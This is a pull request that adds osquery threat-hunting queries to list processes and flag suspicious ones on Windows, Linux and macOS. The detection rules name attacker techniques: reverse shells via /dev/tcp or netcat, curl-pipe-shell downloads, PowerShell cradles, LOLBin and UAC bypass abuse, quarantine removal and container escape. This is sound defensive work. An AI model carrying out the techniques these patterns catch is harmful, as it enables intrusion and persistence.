[Osquery_manager] Processes artifact saved queries

[tomsonpl]

Process Listing and Suspicious Process Detection

Adds comprehensive process listing and suspicious process detection queries for Windows, Linux, and macOS platforms. These queries provide full forensic visibility into running processes with parent chain analysis, code signature validation, file hash enrichment, and targeted threat detection capabilities for incident response and proactive threat hunting.

Core Forensic Artifacts Coverage

#	Artifact	✓	OS	Query	File	Description
17	Process Listing	✅	Windows	process_listing_windows_elastic	8be8	Full forensic process snapshot with authenticode
17a	Process Listing	✅	Linux	process_listing_linux_elastic	a0c7	Full forensic process snapshot with hashes
17b	Process Listing	✅	macOS	process_listing_macos_elastic	888a	Full forensic process snapshot with signatures
17c	Suspicious Processes	✅	Windows	suspicious_processes_windows_elastic	4537	LOLBin abuse, UAC bypass, unsigned binaries
17d	Suspicious Processes	✅	Linux	suspicious_processes_linux_elastic	4da8	Reverse shells, crypto-miners, container escapes
17e	Suspicious Processes	✅	macOS	suspicious_processes_macos_elastic	2b1b	Gatekeeper bypass, osascript abuse, unsigned

MITRE ATT&CK Coverage

Technique ID	Name	Platform(s)
T1059	Command and Scripting Interpreter	Windows, Linux, macOS
T1036	Masquerading	Windows, Linux
T1055	Process Injection	Windows
T1105	Ingress Tool Transfer	Linux
T1218	System Binary Proxy Execution	Windows
T1496	Resource Hijacking (Crypto-mining)	Linux, macOS
T1548.002	Bypass User Account Control	Windows
T1553.001	Gatekeeper Bypass	macOS
T1059.002	AppleScript	macOS
T1611	Escape to Host (Container)	Linux

Queries by Platform

---

🪟 Windows - Process Listing (Full Forensic Snapshot)

Description

Comprehensive Windows process listing with parent process context, code signatures, file hashes, and username resolution. Provides full forensic visibility for threat hunting, incident response, and baseline analysis. Returns all running processes for complete system state assessment.

Detection Focus:

• Complete process tree reconstruction via parent chain enrichment
• Code signature validation using Windows Authenticode
• File hash enrichment (MD5/SHA256) for IOC correlation
• VirusTotal link generation for rapid analyst triage
• Username resolution for attribution analysis
• Elevated token detection for privilege assessment

Result

Query returns all running processes with parent context, code signatures, file hashes, and VirusTotal links for complete forensic analysis.

Platform

windows

Interval

3600 seconds (1 hour)

Query ID

process_listing_windows_elastic

ECS Field Mappings

• event.category → ["process"]
• event.type → ["info"]
• process.pid → pid
• process.name → name
• process.executable → path
• process.command_line → cmdline
• process.working_directory → cwd
• process.parent.pid → ppid
• process.parent.name → parent_name
• process.parent.executable → parent_path
• process.parent.command_line → parent_cmdline
• process.start → start_time
• process.thread.count → threads
• user.id → uid
• user.name → username
• process.hash.md5 → md5
• process.hash.sha256 → sha256
• process.code_signature.status → signature_status
• process.code_signature.subject_name → signer

SQL Query

-- Windows Process Listing with Full Forensic Context
-- Provides comprehensive process information including parent chain, hashes, code signatures, and username
-- Use for: Threat hunting, incident response, baseline analysis
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    u.username,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.resident_size,
    p.total_size,
    p.threads,
    p.handle_count,
    p.on_disk,
    p.elevated_token,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    a.result AS signature_status,
    a.subject_name AS signer
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN users u ON p.uid = u.uid
LEFT JOIN hash h ON p.path = h.path
LEFT JOIN authenticode a ON p.path = a.path
WHERE p.path != '';

---

🐧 Linux - Process Listing (Full Forensic Snapshot)

Description

Comprehensive Linux process listing with parent process context, file hashes, and username resolution. Provides full forensic visibility for threat hunting, incident response, and baseline analysis. Returns all running processes for complete system state assessment.

Detection Focus:

• Complete process tree reconstruction via parent chain enrichment
• File hash enrichment (MD5/SHA256) for IOC correlation
• VirusTotal link generation for rapid analyst triage
• Username resolution for attribution analysis
• Effective UID/GID tracking for privilege escalation detection
• Process state and resource monitoring

Result

Query returns all running processes with parent context, file hashes, and VirusTotal links for complete forensic analysis.

Platform

linux

Interval

3600 seconds (1 hour)

Query ID

process_listing_linux_elastic

ECS Field Mappings

• event.category → ["process"]
• event.type → ["info"]
• process.pid → pid
• process.name → name
• process.executable → path
• process.command_line → cmdline
• process.working_directory → cwd
• process.parent.pid → ppid
• process.parent.name → parent_name
• process.parent.executable → parent_path
• process.parent.command_line → parent_cmdline
• process.start → start_time
• process.thread.count → threads
• user.id → uid
• user.name → username
• user.group.id → gid
• process.hash.md5 → md5
• process.hash.sha256 → sha256

SQL Query

-- Linux Process Listing with Full Forensic Context
-- Provides comprehensive process information including parent chain, hashes, and username
-- Use for: Threat hunting, incident response, baseline analysis
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    u.username,
    p.gid,
    p.euid,
    p.egid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.resident_size,
    p.total_size,
    p.threads,
    p.nice,
    p.on_disk,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN users u ON p.uid = u.uid
LEFT JOIN hash h ON p.path = h.path
WHERE p.path != '';

---

🍎 macOS - Process Listing (Full Forensic Snapshot)

Description

Comprehensive macOS process listing with parent process context, code signatures, file hashes, and username resolution. Provides full forensic visibility for threat hunting, incident response, and baseline analysis. Returns all running processes for complete system state assessment.

Detection Focus:

• Complete process tree reconstruction via parent chain enrichment
• Code signature validation using macOS signature table
• File hash enrichment (MD5/SHA256) for IOC correlation
• VirusTotal link generation for rapid analyst triage
• Team identifier and bundle identifier for app attribution
• Username resolution for attribution analysis

Result

Query returns all running processes with parent context, code signatures, file hashes, and VirusTotal links for complete forensic analysis.

Platform

darwin

Interval

3600 seconds (1 hour)

Query ID

process_listing_macos_elastic

ECS Field Mappings

• event.category → ["process"]
• event.type → ["info"]
• process.pid → pid
• process.name → name
• process.executable → path
• process.command_line → cmdline
• process.working_directory → cwd
• process.parent.pid → ppid
• process.parent.name → parent_name
• process.parent.executable → parent_path
• process.parent.command_line → parent_cmdline
• process.start → start_time
• process.thread.count → threads
• user.id → uid
• user.name → username
• user.group.id → gid
• process.hash.md5 → md5
• process.hash.sha256 → sha256
• process.code_signature.status → signing_status
• process.code_signature.subject_name → authority
• process.code_signature.team_id → team_identifier

SQL Query

-- macOS Process Listing with Full Forensic Context
-- Provides comprehensive process information including parent chain, hashes, code signatures, and username
-- Use for: Threat hunting, incident response, baseline analysis
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    u.username,
    p.gid,
    p.euid,
    p.egid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.resident_size,
    p.total_size,
    p.threads,
    p.nice,
    p.on_disk,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    s.signed AS signing_status,
    s.authority,
    s.identifier AS bundle_identifier,
    s.team_identifier
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN users u ON p.uid = u.uid
LEFT JOIN hash h ON p.path = h.path
LEFT JOIN signature s ON p.path = s.path
WHERE p.path != '';

---

🪟 Windows - Suspicious Process Detection

Description

Identifies Windows processes with suspicious characteristics: unsigned executables, unusual paths (temp, public, downloads), LOLBin abuse, UAC bypass tools, and suspicious parent-child relationships. Enriched with code signatures and file hashes for threat intelligence correlation.

MITRE ATT&CK Coverage:

• T1059 - Command and Scripting Interpreter
• T1036 - Masquerading
• T1055 - Process Injection
• T1218 - System Binary Proxy Execution
• T1548.002 - Bypass User Account Control

Detection Focus:

• Unsigned or untrusted code signatures (non-system paths)
• Suspicious execution paths: Temp, AppData\Local\Temp, Users\Public, Downloads
• PowerShell abuse: encoded commands, bypass flags, download cradles
• Script host execution: mshta.exe, wscript.exe, cscript.exe
• LOLBin abuse: certutil, bitsadmin, rundll32, regsvr32, msiexec
• .NET LOLBins: msbuild.exe, installutil.exe, regasm.exe, regsvcs.exe
• UAC bypass tools: eventvwr.exe, fodhelper.exe, computerdefaults.exe, sdclt.exe
• Remote execution indicators: WMI provider, WinRM host processes
• Fileless malware: processes not on disk (on_disk = 0)

Result

Query returns processes matching suspicious indicators with detection_reason classification for analyst triage.

Platform

windows

Interval

3600 seconds (1 hour)

Query ID

suspicious_processes_windows_elastic

ECS Field Mappings

• event.category → ["process"]
• event.type → ["info"]
• event.kind → "signal"
• process.pid → pid
• process.name → name
• process.executable → path
• process.command_line → cmdline
• process.working_directory → cwd
• process.parent.pid → ppid
• process.parent.name → parent_name
• process.parent.executable → parent_path
• process.parent.command_line → parent_cmdline
• process.start → start_time
• user.id → uid
• process.hash.md5 → md5
• process.hash.sha256 → sha256
• process.code_signature.status → signature_status
• process.code_signature.subject_name → signer
• tags → ["suspicious_process", "threat_hunting", "mitre_t1059", "mitre_t1036", "mitre_t1055", "mitre_t1218", "mitre_t1548_002"]

SQL Query

-- Windows Suspicious Process Detection
-- Identifies processes with potentially malicious characteristics
-- MITRE ATT&CK: T1059, T1036, T1055, T1218, T1548.002
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.on_disk,
    p.elevated_token,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    a.result AS signature_status,
    a.subject_name AS signer,
    CASE
        WHEN a.result IS NOT NULL AND a.result != 'trusted' THEN 'untrusted_signature'
        WHEN a.result IS NULL AND p.path NOT LIKE 'C:\\Windows\\%' THEN 'unsigned_non_system'
        WHEN p.path LIKE '%\\Temp\\%' OR p.path LIKE '%\\tmp\\%' THEN 'suspicious_path_temp'
        WHEN p.path LIKE '%\\AppData\\Local\\Temp\\%' THEN 'suspicious_path_appdata_temp'
        WHEN p.path LIKE '%\\Users\\Public\\%' THEN 'suspicious_path_public'
        WHEN p.path LIKE '%\\Downloads\\%' THEN 'suspicious_path_downloads'
        WHEN p.name IN ('powershell.exe', 'pwsh.exe') AND (p.cmdline LIKE '%encodedcommand%' OR p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-enc %' OR p.cmdline LIKE '%bypass%' OR p.cmdline LIKE '%hidden%') THEN 'powershell_suspicious_args'
        WHEN p.name = 'cmd.exe' AND (p.cmdline LIKE '%/c %' OR p.cmdline LIKE '%/k %') AND pp.name NOT IN ('explorer.exe', 'cmd.exe', 'powershell.exe', 'pwsh.exe') THEN 'cmd_unusual_parent'
        WHEN p.name IN ('mshta.exe', 'wscript.exe', 'cscript.exe') THEN 'script_host_execution'
        WHEN p.name IN ('certutil.exe', 'bitsadmin.exe') AND (p.cmdline LIKE '%http%' OR p.cmdline LIKE '%ftp%' OR p.cmdline LIKE '%decode%' OR p.cmdline LIKE '%urlcache%') THEN 'lolbin_download'
        WHEN p.name = 'rundll32.exe' AND (p.cmdline LIKE '%javascript%' OR p.cmdline LIKE '%vbscript%') THEN 'rundll32_script'
        WHEN p.name IN ('regsvr32.exe', 'msiexec.exe') AND p.cmdline LIKE '%http%' THEN 'lolbin_remote_payload'
        WHEN p.name IN ('msbuild.exe', 'installutil.exe', 'regasm.exe', 'regsvcs.exe') THEN 'dotnet_lolbin'
        WHEN p.name IN ('eventvwr.exe', 'fodhelper.exe', 'computerdefaults.exe', 'sdclt.exe') AND pp.name NOT IN ('explorer.exe', 'svchost.exe') THEN 'uac_bypass_tool'
        WHEN p.name = 'wmic.exe' AND (p.cmdline LIKE '%process%call%create%' OR p.cmdline LIKE '%/node:%') THEN 'wmic_execution'
        WHEN pp.name = 'wmiprvse.exe' OR pp.name = 'wsmprovhost.exe' THEN 'remote_execution_parent'
        WHEN p.on_disk = 0 THEN 'process_not_on_disk'
        ELSE 'other_suspicious'
    END AS detection_reason
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN hash h ON p.path = h.path
LEFT JOIN authenticode a ON p.path = a.path
WHERE p.path != ''
AND (
    -- Untrusted signatures (explicit non-trusted result)
    (a.result IS NOT NULL AND a.result != 'trusted')
    -- Unsigned non-system binaries
    OR (a.result IS NULL AND p.path NOT LIKE 'C:\\Windows\\%' AND p.path NOT LIKE 'C:\\Program Files\\%' AND p.path NOT LIKE 'C:\\Program Files (x86)\\%')
    -- Suspicious execution paths (narrowed to reduce noise)
    OR p.path LIKE '%\\Temp\\%'
    OR p.path LIKE '%\\tmp\\%'
    OR p.path LIKE '%\\AppData\\Local\\Temp\\%'
    OR p.path LIKE '%\\Users\\Public\\%'
    OR p.path LIKE '%\\Downloads\\%'
    -- PowerShell abuse patterns
    OR (p.name IN ('powershell.exe', 'pwsh.exe') AND (
        p.cmdline LIKE '%encodedcommand%'
        OR p.cmdline LIKE '%-e %'
        OR p.cmdline LIKE '%-enc %'
        OR p.cmdline LIKE '%bypass%'
        OR p.cmdline LIKE '%hidden%'
        OR p.cmdline LIKE '%downloadstring%'
        OR p.cmdline LIKE '%iex%'
        OR p.cmdline LIKE '%invoke-expression%'
        OR p.cmdline LIKE '%webclient%'
    ))
    -- Script host execution
    OR p.name IN ('mshta.exe', 'wscript.exe', 'cscript.exe')
    -- LOLBin download/decode
    OR (p.name IN ('certutil.exe', 'bitsadmin.exe') AND (p.cmdline LIKE '%http%' OR p.cmdline LIKE '%decode%' OR p.cmdline LIKE '%urlcache%'))
    -- Rundll32 script execution
    OR (p.name = 'rundll32.exe' AND (p.cmdline LIKE '%javascript%' OR p.cmdline LIKE '%vbscript%'))
    -- Remote payload LOLBins
    OR (p.name IN ('regsvr32.exe', 'msiexec.exe') AND p.cmdline LIKE '%http%')
    -- .NET LOLBins (AppLocker bypass)
    OR p.name IN ('msbuild.exe', 'installutil.exe', 'regasm.exe', 'regsvcs.exe')
    -- UAC bypass tools with unusual parents
    OR (p.name IN ('eventvwr.exe', 'fodhelper.exe', 'computerdefaults.exe', 'sdclt.exe') AND pp.name NOT IN ('explorer.exe', 'svchost.exe'))
    -- WMIC lateral movement / execution
    OR (p.name = 'wmic.exe' AND (p.cmdline LIKE '%process%call%create%' OR p.cmdline LIKE '%/node:%'))
    -- Remote execution indicators
    OR pp.name IN ('wmiprvse.exe', 'wsmprovhost.exe')
    -- Process running from memory (not on disk)
    OR p.on_disk = 0
);

---

🐧 Linux - Suspicious Process Detection

Description

Identifies Linux processes with suspicious characteristics: execution from /tmp, /dev/shm, or /var/tmp, reverse shell patterns, suspicious interpreters, crypto-miners, container escapes, and unusual binary locations. Enriched with file hashes for threat intelligence correlation.

MITRE ATT&CK Coverage:

• T1059 - Command and Scripting Interpreter
• T1036 - Masquerading
• T1105 - Ingress Tool Transfer
• T1496 - Resource Hijacking (Crypto-mining)
• T1611 - Escape to Host (Container Escape)

Detection Focus:

• Suspicious execution paths: /tmp, /var/tmp, /dev/shm, hidden directories
• Reverse shell patterns: /dev/tcp, /dev/udp, netcat -e/-c, socat exec
• Interactive shell spawning: bash -i, sh -i
• Download-and-execute: curl|sh, wget|bash
• Base64 decode obfuscation
• Hidden process names (starting with .)
• Crypto-miner indicators: stratum, xmr, monero, nicehash, pool, cryptonight, randomx
• Container escape patterns: nsenter, --target 1
• Root processes from unusual locations
• Fileless malware: processes not on disk

Result

Query returns processes matching suspicious indicators with detection_reason classification for analyst triage.

Platform

linux

Interval

3600 seconds (1 hour)

Query ID

suspicious_processes_linux_elastic

ECS Field Mappings

• event.category → ["process"]
• event.type → ["info"]
• event.kind → "signal"
• process.pid → pid
• process.name → name
• process.executable → path
• process.command_line → cmdline
• process.working_directory → cwd
• process.parent.pid → ppid
• process.parent.name → parent_name
• process.parent.executable → parent_path
• process.parent.command_line → parent_cmdline
• process.start → start_time
• user.id → uid
• user.group.id → gid
• process.hash.md5 → md5
• process.hash.sha256 → sha256
• tags → ["suspicious_process", "threat_hunting", "mitre_t1059", "mitre_t1036", "mitre_t1105", "mitre_t1496", "mitre_t1611"]

SQL Query

-- Linux Suspicious Process Detection
-- Identifies processes with potentially malicious characteristics
-- MITRE ATT&CK: T1059, T1036, T1105, T1496, T1611
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    p.gid,
    p.euid,
    p.egid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.on_disk,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    CASE
        WHEN p.path LIKE '/tmp/%' OR p.path LIKE '/var/tmp/%' THEN 'suspicious_path_tmp'
        WHEN p.path LIKE '/dev/shm/%' THEN 'suspicious_path_devshm'
        WHEN p.path LIKE '/home/%/.%' THEN 'hidden_in_home'
        WHEN p.cmdline LIKE '%/dev/tcp/%' OR p.cmdline LIKE '%/dev/udp/%' THEN 'reverse_shell_devtcp'
        WHEN p.cmdline LIKE '%nc %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %') THEN 'netcat_shell'
        WHEN p.cmdline LIKE '%ncat %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %') THEN 'ncat_shell'
        WHEN p.cmdline LIKE '%bash -i%' OR p.cmdline LIKE '%sh -i%' THEN 'interactive_shell'
        WHEN p.name IN ('python', 'python3', 'perl', 'ruby', 'php') AND p.cmdline LIKE '%socket%' THEN 'script_socket'
        WHEN p.cmdline LIKE '%curl%|%sh%' OR p.cmdline LIKE '%wget%|%sh%' OR p.cmdline LIKE '%curl%|%bash%' OR p.cmdline LIKE '%wget%|%bash%' THEN 'download_and_execute'
        WHEN p.cmdline LIKE '%base64 -d%' OR p.cmdline LIKE '%base64 --decode%' THEN 'base64_decode'
        WHEN p.name LIKE '.%' THEN 'hidden_process_name'
        WHEN p.cmdline LIKE '%stratum%' OR p.cmdline LIKE '%xmr%' OR p.cmdline LIKE '%monero%' OR p.cmdline LIKE '%nicehash%' OR p.cmdline LIKE '%pool.%' THEN 'crypto_miner'
        WHEN p.cmdline LIKE '%nsenter%' OR p.cmdline LIKE '%--target 1%' THEN 'container_escape'
        WHEN p.uid = 0 AND p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/sbin/%' AND p.path NOT LIKE '/bin/%' THEN 'root_unusual_path'
        WHEN p.on_disk = 0 THEN 'process_not_on_disk'
        ELSE 'other_suspicious'
    END AS detection_reason
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN hash h ON p.path = h.path
WHERE p.path != ''
AND (
    -- Suspicious execution paths
    p.path LIKE '/tmp/%'
    OR p.path LIKE '/var/tmp/%'
    OR p.path LIKE '/dev/shm/%'
    OR p.path LIKE '/home/%/.%'
    -- Reverse shell patterns
    OR p.cmdline LIKE '%/dev/tcp/%'
    OR p.cmdline LIKE '%/dev/udp/%'
    -- Netcat reverse shells
    OR (p.cmdline LIKE '%nc %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %'))
    OR (p.cmdline LIKE '%ncat %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %'))
    OR (p.cmdline LIKE '%socat %' AND p.cmdline LIKE '%exec%')
    -- Interactive shell spawning
    OR p.cmdline LIKE '%bash -i%'
    OR p.cmdline LIKE '%sh -i%'
    -- Script interpreters with network activity
    OR (p.name IN ('python', 'python3', 'python2', 'perl', 'ruby', 'php') AND p.cmdline LIKE '%socket%')
    -- Download and execute patterns
    OR p.cmdline LIKE '%curl%|%sh%'
    OR p.cmdline LIKE '%wget%|%sh%'
    OR p.cmdline LIKE '%curl%|%bash%'
    OR p.cmdline LIKE '%wget%|%bash%'
    -- Base64 decode (often used in obfuscation)
    OR (p.cmdline LIKE '%base64%' AND (p.cmdline LIKE '%-d%' OR p.cmdline LIKE '%--decode%'))
    -- Hidden process names
    OR p.name LIKE '.%'
    -- Running from memory
    OR p.on_disk = 0
    -- Crypto-miner indicators (T1496 Resource Hijacking)
    OR p.cmdline LIKE '%stratum%'
    OR p.cmdline LIKE '%xmr%'
    OR p.cmdline LIKE '%monero%'
    OR p.cmdline LIKE '%nicehash%'
    OR p.cmdline LIKE '%pool.%mining%'
    OR p.cmdline LIKE '%cryptonight%'
    OR p.cmdline LIKE '%randomx%'
    -- Container escape indicators (T1611)
    OR p.cmdline LIKE '%nsenter%'
    OR (p.cmdline LIKE '%--target%' AND p.cmdline LIKE '%--mount%')
    OR (p.cmdline LIKE '%--target 1%')
    -- Root processes from unusual locations
    OR (p.uid = 0 AND p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/sbin/%' AND p.path NOT LIKE '/bin/%' AND p.path NOT LIKE '/opt/%' AND p.path NOT LIKE '/lib/%')
);

---

🍎 macOS - Suspicious Process Detection

Description

Identifies macOS processes with suspicious characteristics: unsigned executables, execution from /tmp or hidden directories, osascript abuse, quarantine bypass, crypto-miners, and suspicious interpreters. Enriched with code signatures and file hashes for threat intelligence correlation.

MITRE ATT&CK Coverage:

• T1059 - Command and Scripting Interpreter
• T1553.001 - Gatekeeper Bypass
• T1059.002 - AppleScript
• T1496 - Resource Hijacking (Crypto-mining)

Detection Focus:

• Unsigned or ad-hoc signed binaries
• Suspicious execution paths: /tmp, /var/tmp, /private/tmp, /Users/Shared, hidden paths
• osascript abuse: JavaScript execution, do shell script, NSAppleScript
• Download-and-execute patterns: curl|sh, wget|bash
• Quarantine attribute removal (Gatekeeper bypass): xattr -d com.apple.quarantine
• Script interpreters with network activity
• Base64 decode obfuscation
• Hidden process names
• Crypto-miner indicators
• Root processes from unusual locations
• Fileless malware: processes not on disk

Result

Query returns processes matching suspicious indicators with detection_reason classification for analyst triage.

Platform

darwin

Interval

3600 seconds (1 hour)

Query ID

suspicious_processes_macos_elastic

ECS Field Mappings

• event.category → ["process"]
• event.type → ["info"]
• event.kind → "signal"
• process.pid → pid
• process.name → name
• process.executable → path
• process.command_line → cmdline
• process.working_directory → cwd
• process.parent.pid → ppid
• process.parent.name → parent_name
• process.parent.executable → parent_path
• process.parent.command_line → parent_cmdline
• process.start → start_time
• user.id → uid
• user.group.id → gid
• process.hash.md5 → md5
• process.hash.sha256 → sha256
• process.code_signature.status → signing_status
• process.code_signature.subject_name → authority
• process.code_signature.team_id → team_identifier
• tags → ["suspicious_process", "threat_hunting", "mitre_t1059", "mitre_t1553_001", "mitre_t1059_002", "mitre_t1496"]

SQL Query

-- macOS Suspicious Process Detection
-- Identifies processes with potentially malicious characteristics
-- MITRE ATT&CK: T1059, T1553.001, T1059.002, T1496
SELECT
    p.pid,
    p.name,
    p.path,
    p.cmdline,
    p.cwd,
    p.parent AS ppid,
    pp.name AS parent_name,
    pp.path AS parent_path,
    pp.cmdline AS parent_cmdline,
    p.uid,
    p.gid,
    p.euid,
    p.egid,
    p.state,
    datetime(p.start_time, 'unixepoch') AS start_time,
    p.on_disk,
    h.md5,
    h.sha256,
    concat('https://www.virustotal.com/gui/file/', h.sha256) AS vt_link,
    s.signed AS signing_status,
    s.authority,
    s.identifier AS bundle_identifier,
    s.team_identifier,
    CASE
        WHEN s.signed = 0 OR s.signed IS NULL THEN 'unsigned_binary'
        WHEN p.path LIKE '/tmp/%' OR p.path LIKE '/var/tmp/%' THEN 'suspicious_path_tmp'
        WHEN p.path LIKE '/private/tmp/%' THEN 'suspicious_path_private_tmp'
        WHEN p.path LIKE '/Users/Shared/%' THEN 'suspicious_path_shared'
        WHEN p.path LIKE '%/.%' THEN 'hidden_path'
        WHEN p.path LIKE '/Users/%/Library/%' AND s.signed = 0 THEN 'unsigned_in_library'
        WHEN p.name = 'osascript' AND (p.cmdline LIKE '%JavaScript%' OR p.cmdline LIKE '%do shell script%') THEN 'osascript_abuse'
        WHEN p.name = 'curl' AND (p.cmdline LIKE '%|%sh%' OR p.cmdline LIKE '%|%bash%') THEN 'curl_pipe_shell'
        WHEN p.cmdline LIKE '%xattr -d com.apple.quarantine%' OR p.cmdline LIKE '%xattr -c%' THEN 'quarantine_removal'
        WHEN p.name IN ('python', 'python3', 'perl', 'ruby') AND p.cmdline LIKE '%socket%' THEN 'script_socket'
        WHEN p.cmdline LIKE '%base64%' AND p.cmdline LIKE '%-D%' THEN 'base64_decode'
        WHEN p.name LIKE '.%' THEN 'hidden_process_name'
        WHEN p.cmdline LIKE '%stratum%' OR p.cmdline LIKE '%xmr%' OR p.cmdline LIKE '%monero%' OR p.cmdline LIKE '%nicehash%' OR p.cmdline LIKE '%pool.%' THEN 'crypto_miner'
        WHEN p.uid = 0 AND p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/sbin/%' AND p.path NOT LIKE '/bin/%' AND p.path NOT LIKE '/System/%' AND p.path NOT LIKE '/Applications/%' THEN 'root_unusual_path'
        WHEN p.on_disk = 0 THEN 'process_not_on_disk'
        ELSE 'other_suspicious'
    END AS detection_reason
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN hash h ON p.path = h.path
LEFT JOIN signature s ON p.path = s.path
WHERE p.path != ''
AND (
    -- Unsigned or ad-hoc signed binaries
    s.signed = 0 OR s.signed IS NULL
    -- Suspicious execution paths
    OR p.path LIKE '/tmp/%'
    OR p.path LIKE '/var/tmp/%'
    OR p.path LIKE '/private/tmp/%'
    OR p.path LIKE '/Users/Shared/%'
    OR p.path LIKE '%/.%'
    -- osascript abuse (AppleScript for command execution)
    OR (p.name = 'osascript' AND (
        p.cmdline LIKE '%JavaScript%'
        OR p.cmdline LIKE '%do shell script%'
        OR p.cmdline LIKE '%NSAppleScript%'
    ))
    -- Download and execute patterns
    OR (p.name = 'curl' AND (p.cmdline LIKE '%|%sh%' OR p.cmdline LIKE '%|%bash%'))
    OR (p.name = 'wget' AND (p.cmdline LIKE '%|%sh%' OR p.cmdline LIKE '%|%bash%'))
    -- Quarantine attribute removal (Gatekeeper bypass)
    OR p.cmdline LIKE '%xattr -d com.apple.quarantine%'
    OR p.cmdline LIKE '%xattr -c%'
    OR p.cmdline LIKE '%xattr -r -d%'
    -- Script interpreters with network activity
    OR (p.name IN ('python', 'python3', 'python2', 'perl', 'ruby', 'php') AND p.cmdline LIKE '%socket%')
    -- Base64 decode (obfuscation)
    OR (p.cmdline LIKE '%base64%' AND p.cmdline LIKE '%-D%')
    -- Hidden process names
    OR p.name LIKE '.%'
    -- Running from memory
    OR p.on_disk = 0
    -- Crypto-miner indicators (T1496 Resource Hijacking)
    OR p.cmdline LIKE '%stratum%'
    OR p.cmdline LIKE '%xmr%'
    OR p.cmdline LIKE '%monero%'
    OR p.cmdline LIKE '%nicehash%'
    OR p.cmdline LIKE '%pool.%mining%'
    OR p.cmdline LIKE '%cryptonight%'
    OR p.cmdline LIKE '%randomx%'
    -- Root processes from unusual locations
    OR (p.uid = 0 AND p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/sbin/%' AND p.path NOT LIKE '/bin/%' AND p.path NOT LIKE '/System/%' AND p.path NOT LIKE '/Applications/%' AND p.path NOT LIKE '/Library/%')
);

---

This PR was AI assisted with Claude Code

[elasticmachine]

💚 Build Succeeded

• Buildkite Build
• Commit: 0e7a05d